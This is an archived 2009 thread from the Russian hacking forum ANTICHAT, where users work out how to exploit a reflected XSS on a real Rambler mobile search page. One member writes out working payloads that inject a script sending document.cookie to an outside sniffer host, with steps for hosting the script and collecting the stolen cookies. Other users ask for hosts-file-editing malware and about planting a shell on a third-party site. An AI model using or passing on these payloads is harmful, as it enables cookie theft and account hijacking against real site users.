ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.09.2009, 19:54
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669
Репутация:
-26
|
|
Сообщение от Что? Где? Когда?
Опять не получилось, я с этим сниффером много пользуюсь, а вот я сделал как ты говолил, а в логах пусто.
Короче говорю тебе хсс, а ты проверь сделай и скажи мне если не трудно:
Код HTML:
http://m.myrambler.ru/search.php?pagelen=10&query="><script>alert('xss')</script>
Последний раз редактировалось Cehennem; 04.09.2009 в 19:58..
|
|
|
04.09.2009, 20:17
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Старая XSS... Она срабатывает тогда, когда есть результаты поиска. В твоем случае их нету...
|
|
|
|
04.09.2009, 20:24
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Что? Где? Когда?
Понятно, я просто не тестил, в таком случае напиши там:
если google неищется, попробуй любое другое слово. Не надо советовать что-либо, если сам не знаешь / не можешь проверить! Толку то со слова google? И + кодируется в %2B, ибо без этого он считается как пробел.
|
|
|
|
04.09.2009, 20:34
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Что? Где? Когда?
то что популярное, а + нужен чтобы не искать "слово", тоесть ксс целиком.
ок, больше тут советовать на примерах небуду.
Мы про XSS говорим, а не про выдачу в поиске гугла =\. + это оператор конкатезации строк, а не "нужен чтобы не искать "слово", тоесть ксс целиком". И в URL-encode он равен %2B. Без этого он считается как пробел. Тебя никто и не запрещает советовать на примерах, просто сам сначала проверяй, а уже потом советуй.
ЗЫ: Тор не анонимен, и это доказано 
|
|
|
|
05.09.2009, 12:08
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
dell
Последний раз редактировалось Zitt; 09.09.2009 в 16:57..
|
|
|
|
05.09.2009, 12:15
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 67
Провел на форуме:
212146
Репутация:
8
|
|
есть у когонибудь файлы вируса который правит этот файл -"C:\WINDOWS\system32\drivers\etc\hosts" если не трудно скинте ссылку где скачать можно...или как самому написать такой... вобщем интересует всё по этой теме...буду рад любой помощи...
|
|
|
|
05.09.2009, 12:57
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669
Репутация:
-26
|
|
PHP код:
http://m.myrambler.ru/search.php?pagelen=10&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Вот это работает.
А когда ставлю ссылку из сниффера, тогда не работает.
mailbrush прав, если значение поисков нету тогда и xss нету, дело в том что в значениях поиска нет ссылки из сниффера, а раза "><script>alert('xss')</script> есть, поэтому xss как "><script>alert('xss')</script> действует, а ссылка из сниффера не действует, |
|
|
|
05.09.2009, 13:17
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Что? Где? Когда?
Ну ты же сам написал:
"Она срабатывает тогда, когда есть результаты поиска. В твоем случае их нету..."
google, или любое другое слово, которое можно найти в поиске, для того чтобы были результаты поиска, + там и нужен как пробел.
Правда там ещё нужно добавить оператор "OR" (если яндекс поддерживает).
[слово]+OR+[xss]
Всё для того чтобы была выдача результатов.
Ну нимогу я проверить без tor, другие его в мануалы тычат, а ему лень читать, вот и решил помочь.
PS: анонимность вообще относительна.
Если я напишу Google, выдача поиска будет, но XSS нет. А если же
Код:
google "><script>img = new Image(); img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;</script>
не будет выдачи, т.к. поиск ничего не найдет. И опять советуешь не проверяя... Оператора OR нету в рамблере, и при чем здесь яша? В коде + нужен как плюс, а не пробел! Ты конкатезируешь
Код:
http://httpz.ru/ndemo.gif?
и куки.
Cehennem, зарегай себе хост, к примеру sdagsfhfh.ru, залей файлик script.js по адресу
Код:
http://sdagsfhfh.ru/script.js
с содержанием
Код:
img = new Image();
img.src = "http://httpz.ru/ndemo.gif?"+document.cookie;
Дальше заходи
Код:
http://m.myrambler.ru/search.php?pagelen=10&query="><script src="http://sdagsfhfh.ru/script.js"></script>
Потом на сниффер И ты увидишь стыренные куки...
|
|
|
|
05.09.2009, 15:09
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861
Репутация:
5
|
|
У меня вопросик. есть сайтик...открыт 88 порт. там открыты две дерриктория одна админка...во второй фаил httacces - читаемый. можно туда шшел впарить. За ссылкой сайта пишите в личку.
|
|
|
|
05.09.2009, 15:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Это обычный листинг.
Ничего не сделаешь.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
